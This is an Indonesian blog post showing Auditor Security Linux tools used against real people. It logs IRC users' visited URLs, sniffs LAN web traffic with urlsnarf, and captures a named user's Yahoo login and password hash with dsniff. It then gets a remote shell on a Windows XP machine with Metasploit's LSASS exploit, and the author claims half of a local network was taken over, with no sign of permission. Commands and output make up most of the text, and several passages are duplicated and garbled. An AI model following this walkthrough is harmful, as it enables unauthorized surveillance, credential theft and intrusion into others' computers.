Auditor security merupakan sebuah system operasi yang bersifat live-system berbasiskan pada knopix.
Menurut penciptanya yang dituliskan pada http://remote-exploit.org , linux Auditor Security diciptakan untuk
memenuhi kebutuhan para excellent-user yang dikombinasikan dengan toolset yang optimal serta penggunakan
yang user friendly. Program – program open source pada auditor security menawarkan toolset yang komplit
untuk meng-analysis keamanan sebuah system, byte per byte.
Dalam tulisan ini akan dibahas sebagian dari security tool set yang terdapat pada linux Auditor Security.
A. Grabbing URL
Yang dimaksusd grabbing URL adalah mendapatkan alamat URL yang dikunjungi oleh seseorang tanpa ataupun sepengetahuan
dari orang tersebut. Di bawah akan dibahas mengenai grabbing URL pada suatu channel IRC dan pada jaringan lokal yang
terhubung dengan internet.
dari orang tersebut. Di bawah akan dibahas mengenai grabbing URL pada suatu channel IRC dan pada jaringan lokal yang
terhubung dengan internet.
1. Grabbing URL pada channel IRC
Untuk melakukan grabbing URL pada channel IRC bisa dilakukan dengan menggunkan XCHAT yang telah tersedia secara bult-in
pada linux auditor. Langkah pertama tentu saja kita harus join ke channel tertentu. Setelah join ke channel tertentu
langkah selanjutnya klik tab Windows kemudian pilih URL Grabber. Tunggu beberapa saat, maka jika ada salah satu user yang
tergabung pada channel tersebut membuka sebuah URL, list dari URL Grabber akan bertambah.
Berikut ini hasil grabbing URL yang penulis lakukan pada channel : #hnet, #skb50, #indonona, #echo, #k-elektronik, #bandung
pada server dalnet tanggal 1 September 2005.
pada linux auditor. Langkah pertama tentu saja kita harus join ke channel tertentu. Setelah join ke channel tertentu
langkah selanjutnya klik tab Windows kemudian pilih URL Grabber. Tunggu beberapa saat, maka jika ada salah satu user yang
tergabung pada channel tersebut membuka sebuah URL, list dari URL Grabber akan bertambah.
Berikut ini hasil grabbing URL yang penulis lakukan pada channel : #hnet, #skb50, #indonona, #echo, #k-elektronik, #bandung
pada server dalnet tanggal 1 September 2005.
ftp.orghttp://echo.or.id
http://irc.jraxis.com/dalnet/default/
http://kline.dal.net/exploits/akills.htm#ma
http://kline.dal.net/exploits/akills.htm#ma)))
http://kline.dal.net/massads/mup.htm
http://kline.dal.net/proxy/
http://miranda-im.org
http://tiongkokmusic.com:2222/listen.pls
http://unut.hollosite.com
http://valueshells.com
http://valueshells.com/disc.html
http://www.dal.net/
http://www.dal.net/aup/
http://www.equinix.net
http://www.kecoak.or.id
http://www.malanghack.net/
http://www.rayofshadow.or.id
http://www.valueshells.com
irc.hackerszone.orgirc.vsnl.com
www.balihack.or.idwww.bandung-dal.net
WwW.BaNdUnG.tKwww.dal.net/proxies
www.jraxis.comwww.malanghack.net
WwW.PsYcHoPeD.InFowww.scoopsite.com
www.superask.netwww.VALUESHELLS.com
www.ValueShells.comwww.valueshells.com
www.valueshells.comwww.w0nk.org
www.zone-h.org/en/defacements/mirror/id=2840693/>
www.zone-h.org/en/defacements/mirror/id=2840696/>
Daftar URL diatas merupakan daftar dari URL-URL yang dikunjungi para chatter pada channel – channel diatas.
Kelemahan dari XCHAT yaitu XCHAT belum mampu secara spesifik mengetahui URL yang dikunjungi tiap chatter.
2. Grabbing URL Pada Jaringan Lokal Yang Terhubung Pada Internet
Selain grabbing URL pada suatu channel IRC kita juga bisa melakukan grabbing URL pada jaringan lokal yang terhubung
pada internet. Untuk melakukanya kita bisa menggunakan URL Snarf. Untuk menjalankan URL Snarf ketikan perintah berikut
pada konsole :
hyraxz@chidori~dove# urlsnarf -i eth0 > ./grabMeBabe.txt
Setelah URL Snarf berhasil dijalankan maka tugas kita selanjutnya adalah tinggal tidur dan membuka hasil grabbing
keesokan hari.Berikut ini satu baris potongan dari hasil grabbing URL yang berhasil penulis capture, penulis hanya
menunjukan 1 baris dari 994 baris hasil grabbing yang didapat mulai dari jam 00:15:37 sampai 06:21:10 pada
tanggal 02/Sep/2005.
192.168.10.5 - - [02/Sep/2005:05:38:37 -0400] "GET http://www.friendster.com/friendrequests.php?lastact=approve&sc=933
HTTP/1.1" - - "http://www.friendster.com/friendrequests.php?statpos=homealerts" "Mozilla/5.0 (X11; U; Linux i686; en-US;
rv:1.7.5) Gecko/20041128 Firefox/1.0 (Debian package 1.0-4)"
Dari hasil grabbing tersebut maka kita bisa mengambil suatu analisa bahwa komputer dengan IP 192.168.10.5
pada [02/Sep/2005:05:38:37 -0400] dengan menggunakan methode GET sedang mengakses www.friendster.com dan kemungkinan
besar user tersebut sedang meng-approve friend request. Sangat dimungkinkan browser dari user tersebut adalah
Mozzila/5.0 dengan mamakai sistem operasi linux.
B. Sniffing Menggunakan DSNIFF
Sniffing merupakan usaha yang dilakukan untuk memperoleh suatu informasi tertentu dalam suatu network dangan jalan
meng-capture paket – paket data yang ada pada suatu network dan kemudian menganalisinya untuk diambil informasinya
yang dianggap penting. Dsiniff merupakan suatu tool sniffing yang telah tersedia pada linux auditor security.
Untuk memulai sniffing ketikan perintah berikut ini:
hyraxz@chidori~dove# dsniff –i eth0 –W /mnt/hda5/passwd_HhAN.db
perintah diatas akan memerintahkan dsniff untuk meng-capture paket - paket yang melintasi eth0 dan menuliskan hasilnya
pada sebuah file dengan nama passwd_HhAN.db yang disimpan pada directory /mnt/hda5/.
Untuk membaca hasilnya gunakan perintah berikut ini:
hyraxz@chidori~ dove# dsniff -r /mnt/hda5/passwd_HhAN.db
Atau kalau kita ingin merubahnya dalam format ASCII sehingga file tersebut bisa dibuka menggunakan notepad saat di Windows,
ketik perintah berikut :
hyraxz@chidori~dove# dsniff -r /mnt/hda5/passwd_HhAN.db > /mnt/hda5/GetDownEnemy.txt
Berikut ini merupakan file ASCII hasil dari sniffing yang berhasil penulis documentasikan :
09/02/05 04:58:42 tcp 192.168.10.7.1183 -> p2.rd.scd.yahoo.com.80 (http)GET
/reg/login1/newym_nouc/lisu/login/us/ym/*http://login.yahoo.com/config/login?.tries=1&.src=ym&.md5=&.hash=&.js=1&.
last=&promo=&.intl=us&.bypass=&.partner=&.u=b261flt1heuai&.v=0&.challenge=Ymjr9vf35ZRMTV9YkEFy0vhTsQz0&.yplus=&.
emailCode=&pkg=&stepid=&.ev=&hasMsgr=1&.chkP=Y&.done=http%3A//mail.yahoo.com&login=rip_zombie
&passwd=ace61b359fa543aceccf111dbd767e74&.persistent=&.hash=1&.md5=1 HTTP/1.1Host: us.rd.yahoo.com
Berikut analysis dari hasil sniffing di atas:
1. Sniffing dilakukan pada tgl 02 September 2005 jam 04:58:42. Sniffing dilakukan pada koneksi TCP antara host dengan
IP 192.168.10.7:1183 dengan server yahoo pada p2.rd.scd.yahoo.com:80 denagan memakai protokol HTTP.
2. User Name untuk login ke server e-mail dari user tersebut adalah rip_zombie dengan password hasil enkripsi
MD5 “ace61b359fa543aceccf111dbd767e74†(tanpa tanda petik).
3. Server mail yahoo menggunakan methode enkripsi MD5.
C. Remote Exploit
Remote exploit adalah suatu program yang dijalankan pada computer attacker, digunakan untuk menginjeksi komputer target
sehingga attacker memperoleh hak akses lebih dari yang diijinkan tanpa ataupun sepengetahuan dari korban.
Linux Auditor Security menyediakan tool tersebut dengan nama Metasploit.
Menyusup di Jaringan SKB50 Menggunakan Metasploit
Sebelum memulainya tentu saja komputer attaccker harus di set IP-nya sesuai dengan IP dari jaringan SKB50. berikut ini
konfigurasi IP dari komputer attacker yang telah disesuaikan dengan konfigurasi IP pada jaringan SKB50.
konfigurasi IP dari komputer attacker yang telah disesuaikan dengan konfigurasi IP pada jaringan SKB50.
hyraxz@chidori~dove# ifconfig –eth0 192.168.0.10 netmask 255.255.255.0
hyraxz@chidori~dove# ifconfig
eth0 Link encap:Ethernet HWaddr 00:E0:18:F3:9A:D0
inet addr:192.168.0.10 Bcast:192.168.0.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:712 errors:0 dropped:0 overruns:0 frame:0
TX packets:10 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:69398 (67.7 KiB) TX bytes:595 (595.0 b)
Interrupt:5 Base address:0x9800
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:10 errors:0 dropped:0 overruns:0 frame:0
TX packets:10 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:500 (500.0 b) TX bytes:500 (500.0 b)
Selanjutnya ketikan perintah dibawah ini untuk memanggil console metasploit :
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:10 errors:0 dropped:0 overruns:0 frame:0
TX packets:10 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:500 (500.0 b) TX bytes:500 (500.0 b)
Selanjutnya ketikan perintah dibawah ini untuk memanggil console metasploit :
hyraxz@chidori~dove# cd /opt/auditor/metasploit
hyraxz@chidori~dove# ./msfconsole
jika berhasil maka akan muncul tulisan seperti berikut ini :
888 888 d8b888
888 888 Y8P888
888 888 888
88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P Y8b888 "88b88K 888 "88b888d88""88b888888
888 888 88888888888888 .d888888"Y8888b.888 888888888 888888888
888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b.
888 888 888 "Y8888 "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
888
888
888
+ -- --=[ msfconsole v2.4 [75 exploits - 75 payloads]
msf >
untuk memulai penggunakanya ketikan perintah-perintah dibawah ini:
msf > show exploits
Metasploit Framework Loaded Exploits
====================================
====================================
| 3com_3cdaemon_ftp_overflow | 3Com 3CDaemon FTP Server Overflow |
| Creditsafp_loginext aim_goaway apache_chunked_win32 arkeia_agent_accessarkeia_type77_macos arkeia_type77_win32backupexec_ns bakbone_netvault_heapblackice_pam_icq cabrightstor_discocabrightstor_disco_servicepc cabrightstor_uniagentcalicclnt_getconfig calicserv_getconfigdistcc_exec exchange2000_xexch50globalscapeftp_user_input ia_webmailicecast_header iis40_htriis50_printer_overflow iis50_webdav_ntdlliis_fp30reg_chunked iis_nsiislog_postiis_source_dumper iis_w3who_overflowimail_imap_delete imail_ldapirix_lpsched_exec lsass_ms04_011maxdb_webdbm_get_overflow mercantec_softcart minishare_get_overflow msasn1_ms04_007_killbillmsmq_deleteobject_ms05_017 msrpc_dcom_ms03_026 mssql2000_preauthentication mssql2000_resolutionnetterm_netftpd_user_overflow openview_omnibackoracle9i_xdb_ftp oracle9i_xdb_ftp_passpayload_handler poptop_negative_readrealserver_describe_linux samba_nttrans samba_trans2open samba_trans2open_osxsamba_trans2open_solsparc sambar6_search_resultsseattlelab_mail_55 sentinel_lm7_overflowservu_mdtm_overflow smb_sniffersolaris_dtspcd_noir solaris_kcms_readfilesolaris_lpd_exec solaris_sadmind_execsolaris_snmpxdmid solaris_ttypromptsquid_ntlm_authenticate svnserve_datetrackercam_phparg_overflow uow_imap4_copyuow_imap4_lsub ut2004_secure_linuxut2004_secure_win32 warftpd_165_passwarftpd_165_user webstar_ftp_userwindows_ssl_pct wins_ms04_045wsftp_server_503_mkd | Metasploit Framework CreditsAppleFileServer LoginExt PathName Overflow AOL Instant Messenger goaway OverflowApache Win32 Chunked Encoding Arkeia Backup Client Remote AccessArkeia Backup Client Type 77 Overflow (Mac OS X) Arkeia Backup Client Type 77 Overflow (Win32)Veritas Backup Exec Name Service Overflow BakBone NetVault Remote Heap OverflowISS PAM.dll ICQ Parser Buffer Overflow CA BrightStor Discovery Service OverflowCA BrightStor Discovery Service SERVICEPC Overflo CA BrightStor Universal Agent OverflowCA License Client GETCONFIG Overflow CA License Server GETCONFIG OverflowDistCC Daemon Command Execution Exchange 2000 MS03-46 Heap OverflowGlobalSCAPE Secure FTP Server user input overflow IA WebMail 3.x Buffer OverflowIcecast (<= 2.0.1) Header Overwrite (win32) IIS 4.0 .HTR Buffer OverflowIIS 5.0 Printer Buffer Overflow IIS 5.0 WebDAV ntdll.dll OverflowIIS FrontPage fp30reg.dll Chunked Overflow IIS nsiislog.dll ISAPI POST OverflowIIS Web Application Source Code Disclosure IIS w3who.dll ISAPI OverflowIMail IMAP4D Delete Overflow IMail LDAP Service Buffer OverflowIrix lpsched Command Execution Microsoft LSASS MSO4-011 OverflowMaxDB WebDBM GET Buffer Overflow Mercantec SoftCart CGI OverflowMinishare 1.41 Buffer Overflow Microsoft ASN.1 Library Bitstring Heap OverflowMicrosoft Message Queueing Service MSO5-017 Microsoft RPC DCOM MSO3-026MSSQL 2000/MSDE Hello Buffer Overflow MSSQL 2000/MSDE Resolution OverflowNetTerm NetFTPD USER Buffer Overflow HP OpenView Omniback II Command ExecutionOracle 9i XDB FTP UNLOCK Overflow (win32) Oracle 9i XDB FTP PASS Overflow (win32)Metasploit Framework Payload Handler Poptop Negative Read OverflowRealServer Describe Buffer Overflow Samba Fragment Reassembly OverflowSamba trans2open Overflow Samba trans2open Overflow (Mac OS X)Samba trans2open Overflow (Solaris SPARC) Sambar 6 Search Results Buffer OverflowSeattle Lab Mail 5.5 POP3 Buffer Overflow SentinelLM UDP Buffer OverflowServ-U FTPD MDTM Overflow SMB Password Capture ServiceSolaris dtspcd Heap Overflow Solaris KCMS Arbitary File ReadSolaris LPD Command Execution Solaris sadmind Command ExecutionSolaris snmpXdmid AddComponent Overflow Solaris in.telnetd TTYPROMPT Buffer OverflowSquid NTLM Authenticate Overflow Subversion Date SvnserveTrackerCam PHP Argument Buffer Overflow University of Washington IMAP4 COPY OverflowUniversity of Washington IMAP4 LSUB Overflow Unreal Tournament 2004 "secure" Overflow (Linux)Unreal Tournament 2004 "secure" Overflow (Win32) War-FTPD 1.65 PASS OverflowWar-FTPD 1.65 USER Overflow WebSTAR FTP Server USER OverflowMicrosoft SSL PCT MS04-011 Overflow Microsoft WINS MS04-045 Code ExecutionWS-FTP Server 5.03 MKD Overflow |
msf > use lsass_ms04_011
msf lsass_ms04_011 > show payloads
Metasploit Framework Usable Payloads
====================================
====================================
| win32_adduserwin32_bind win32_bind_dllinjectwin32_bind_meterpreter win32_bind_stgwin32_bind_stg_upexec win32_bind_vncinjectwin32_exec win32_passivexwin32_passivex_meterpreter win32_passivex_stgwin32_passivex_vncinject win32_reversewin32_reverse_dllinject win32_reverse_meterpreterwin32_reverse_ord win32_reverse_ord_vncinjectwin32_reverse_stg win32_reverse_stg_upexecwin32_reverse_vncinject | Windows Execute net user /ADDWindows Bind Shell Windows Bind DLL InjectWindows Bind Meterpreter DLL Inject Windows Staged Bind ShellWindows Staged Bind Upload/Execute Windows Bind VNC Server DLL InjectWindows Execute Command Windows PassiveX ActiveX Injection PayloadWindows PassiveX ActiveX Inject Meterpreter Payload Windows Staged PassiveX ShellWindows PassiveX ActiveX Inject VNC Server Payload Windows Reverse ShellWindows Reverse DLL Inject Windows Reverse Meterpreter DLL InjectWindows Staged Reverse Ordinal Shell Windows Reverse Ordinal VNC Server InjectWindows Staged Reverse Shell Windows Staged Reverse Upload/ExecuteWindows Reverse VNC Server Inject |
msf lsass_ms04_011 > set PAYLOAD win32_bind
PAYLOAD -> win32_bind
msf lsass_ms04_011(win32_bind) > set RHOST 192.168.0.27
RHOST -> 192.168.0.27
msf lsass_ms04_011(win32_bind) > show options
PAYLOAD -> win32_bind
msf lsass_ms04_011(win32_bind) > set RHOST 192.168.0.27
RHOST -> 192.168.0.27
msf lsass_ms04_011(win32_bind) > show options
Exploit and Payload Options
===========================
===========================
Exploit: Name Default Description
-------- ------ ------------ ------------------
required RHOST 192.168.0.19 The target address
required RPORT 139 The target port
-------- ------ ------------ ------------------
required RHOST 192.168.0.19 The target address
required RPORT 139 The target port
Payload: Name Default Description
-------- -------- ------- ------------------------------------------
required EXITFUNC thread Exit technique: "process", "thread", "seh"
required LPORT 4444 Listening port for bind shell
-------- -------- ------- ------------------------------------------
required EXITFUNC thread Exit technique: "process", "thread", "seh"
required LPORT 4444 Listening port for bind shell
Target: Automatic
msf lsass_ms04_011(win32_bind) > exploit
RHOST -> 192.168.0.27
msf lsass_ms04_011(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Detected a Windows XP target (KICKS)
[*] Windows XP may require two attempts
[*] Sending 8 DCE request fragments...
[*] Sending the final DCE fragment
[*] Got connection from 192.168.0.10:1382 <-> 192.168.0.27:4444
RHOST -> 192.168.0.27
msf lsass_ms04_011(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Detected a Windows XP target (KICKS)
[*] Windows XP may require two attempts
[*] Sending 8 DCE request fragments...
[*] Sending the final DCE fragment
[*] Got connection from 192.168.0.10:1382 <-> 192.168.0.27:4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32> netstat -a
netstat -a
Active Connections
| Protocol | Local Address | Foreign Address | State |
| TCPTCP TCPTCP TCPTCP TCPTCP TCPTCP TCPTCP TCPTCP UDPUDP UDPUDP UDPUDP UDPUDP | kicks:epmapkicks:microsoft-ds kicks:1025kicks:1056 kicks:1090kicks:1095 kicks:1098kicks:1130 kicks:4444kicks:5000 kicks:netbios-ssnkicks:1162 kicks:1169kicks:4444 kicks:microsoft-dskicks:isakmp kicks:ntp kicks:1900 kicks:ntpkicks:netbios-ns kicks:netbios-dgmkicks:1900 | 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 192.168.0.10:1382 *:* *:* *:* *:* *:* *:* *:* *:* | LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING ESTABLISHED |
^c
Caught interrupt, exit connection? [y/n]y
msf lsass_ms04_011(win32_bind) >
Analisa dari hasil aktivitas diatas adalah sebagai berikut :
metasploit meng-attack korban melalui port 139 kemudian memasukan payload yang akan membangun hubungan antara korban
dengan attacker dengan menggunakan mode koneksi TCP, dimana hubungan dilakukan melalui port 4444 pada sisi korban
dan port 1382 pada sisi attacker.Setelah bind port antara attacker dengan korban terbentuk maka attacker menguasai
sepenuhnya aktifitas dari komputer korban. Dari 12 komputer yang hidup saat analisa dilakukan pada jaringan lokal
SKB50 6 buah komputer mampu di tembus dengan menggunakan metasploit, ini berarti bahwa 50% jaringan SKB50 pada saat
itu ada di tangan attacker ;).
Daftar Pustaka :
Fwerd (Kecoak Elektronik), Memanen Password Di Jaringan Lokal dengan dsniff,
Terbitan Online Kecoak Elektronik http://k-elektronik.co.id.
From Exploit, http://new.remote-exploit.org/index.php/Auditor_main.
Terbitan Online Kecoak Elektronik http://k-elektronik.co.id.
From Exploit, http://new.remote-exploit.org/index.php/Auditor_main.
0 comments:
Post a Comment